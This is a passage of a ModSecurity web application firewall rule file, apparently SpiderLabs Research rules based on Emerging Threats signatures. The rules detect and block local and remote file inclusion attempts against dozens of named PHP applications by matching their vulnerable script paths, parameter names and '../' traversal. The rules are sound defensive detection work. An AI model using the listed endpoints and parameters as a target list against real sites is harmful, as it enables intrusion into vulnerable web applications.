DynPage dynpage_load.php file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011562) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PithCMS oldnews_reader.php lang Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /oldnews_reader.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011562,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PithCMS oldnews_reader.php lang Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:lang "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PithCMS oldnews_reader.php lang Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011554) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_jphone Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011554,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_jphone Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jphone" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_jphone Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011552) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FCMS familynews.php current_user_id Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /familynews.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011552,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS FCMS familynews.php current_user_id Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:current_user_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FCMS familynews.php current_user_id Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011553) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FCMS settings.php current_user_id Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /settings.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011553,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS FCMS settings.php current_user_id Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:current_user_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FCMS settings.php current_user_id Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011377) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SaurusCMS com_del.php class_path Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /com_del.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011377,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS SaurusCMS com_del.php class_path Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:class_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SaurusCMS com_del.php class_path Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011384) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MAXcms fm_includes_special Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /includes/file_manager/special.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011384,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS MAXcms fm_includes_special Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:fm_includes_special/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MAXcms fm_includes_special Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011385) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla NoticeBoard Component controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011385,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla NoticeBoard Component controller Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_noticeboard" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla NoticeBoard Component controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011451) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla JGrid Component File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011451,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla JGrid Component File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jgrid" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla JGrid Component File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011453) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Fusion maincore.php folder_level Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /maincore.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011453,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Fusion maincore.php folder_level Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:folder_level "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Fusion maincore.php folder_level Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011454) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 4images global.php db_servertype Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /global.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011454,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS 4images global.php db_servertype Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:db_servertype/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 4images global.php db_servertype Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011828) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 724CMS section.php Module Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /section.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011828,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS 724CMS section.php Module Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:Module "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 724CMS section.php Module Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011829) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(1) SecRule REQUEST_LINE "@contains /classes/flash_mp3_player/extras/external_feeds/getfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011829,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(1)',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(1)',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011830) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(2) SecRule REQUEST_LINE "@contains /classes/flash_mp3_player.23/extras/external_feeds/getfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011830,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(2)',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(2)',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011831) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CMS Board site_path Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /include/admin.lib.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011831,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS CMS Board site_path Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:site_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CMS Board site_path Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011837) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS A6MamboHelpDesk Admin.a6mambohelpdesk.php Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011837,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS A6MamboHelpDesk Admin.a6mambohelpdesk.php Remote File inclusion Attempt',tag:'web-application-attack',tag:'cve,CVE-2006-3930'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_live_site/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS A6MamboHelpDesk Admin.a6mambohelpdesk.php Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011843) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BaconMap updatelist.php filepath Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /baconmap/admin/updatelist.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011843,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS BaconMap updatelist.php filepath Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:filepath "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BaconMap updatelist.php filepath Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011844) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_rwcards mosConfig_absolute_path Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /com_rwcards/rwcards.advancedate.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011844,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_rwcards mosConfig_absolute_path Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_rwcards mosConfig_absolute_path Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011846) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OrangeHRM uri Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011846,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS OrangeHRM uri Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains uniqcode=KPI" "chain" SecRule REQUEST_LINE "@contains menu_no_top=performance" "chain" SecRule ARGS:uri "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OrangeHRM uri Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011847) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jomestate Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /real_estate/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011847,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jomestate Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jomestate" "chain" SecRule &TX:'/RFI.*ARGS:task/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jomestate Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011853) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS W-Agora search.php bn Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /news/search.php3" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011853,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS W-Agora search.php bn Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,44370'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:bn/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS W-Agora search.php bn Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011880) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBazar picturelib.php Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /bazar/picturelib.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011880,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS phpBazar picturelib.php Remote File inclusion Attempt',tag:'web-application-attack',tag:'cve,CVE-2010-2315'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBazar picturelib.php Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011881) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Open Web Analytics mw_plugin.php IP Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /mw_plugin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011881,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Open Web Analytics mw_plugin.php IP Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:IP/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Open Web Analytics mw_plugin.php IP Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011882) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Open Web Analytics owa_action Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011882,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Open Web Analytics owa_action Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:owa_action "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Open Web Analytics owa_action Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011883) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Open Web Analytics owa_do Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011883,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Open Web Analytics owa_do Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:owa_do "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Open Web Analytics owa_do Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011884) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS iGaming CMS loadplugin.php load Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /admin/loadplugin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011884,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS iGaming CMS loadplugin.php load Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:load "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS iGaming CMS loadplugin.php load Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011935) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component joomlaXplorer admin.joomlaxplorer.php File Inclusion Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_joomlaxplorer/admin.joomlaxplorer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011935,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component joomlaXplorer admin.joomlaxplorer.php File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component joomlaXplorer admin.joomlaxplorer.php File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011928) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TFTgallery adminlangfile Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /admin/thumbnailformpost.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011928,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS TFTgallery adminlangfile Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:adminlangfile "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TFTgallery adminlangfile Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011929) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_banners banners.class.php Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_banners/banners.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011929,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_banners banners.class.php Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_banners banners.class.php Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011941) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Open Source Support Ticket System module.php Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /module.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011941,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Open Source Support Ticket System module.php Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains module=osTicket" "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Open Source Support Ticket System module.php Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011948) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AWCM window_top.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /awcm/includes/window_top.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011948,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS AWCM window_top.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:theme_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AWCM window_top.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011949) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AWCM common.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /awcm/control/common.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011949,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS AWCM common.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:lang_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AWCM common.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011950) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AWCM header.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /awcm/header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011950,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS AWCM header.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:theme_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AWCM header.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012006) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MassMirror Uploader example_1.php Remote File Inclusion attempt SecRule REQUEST_LINE "@contains /Base/example_1.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012006,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS MassMirror 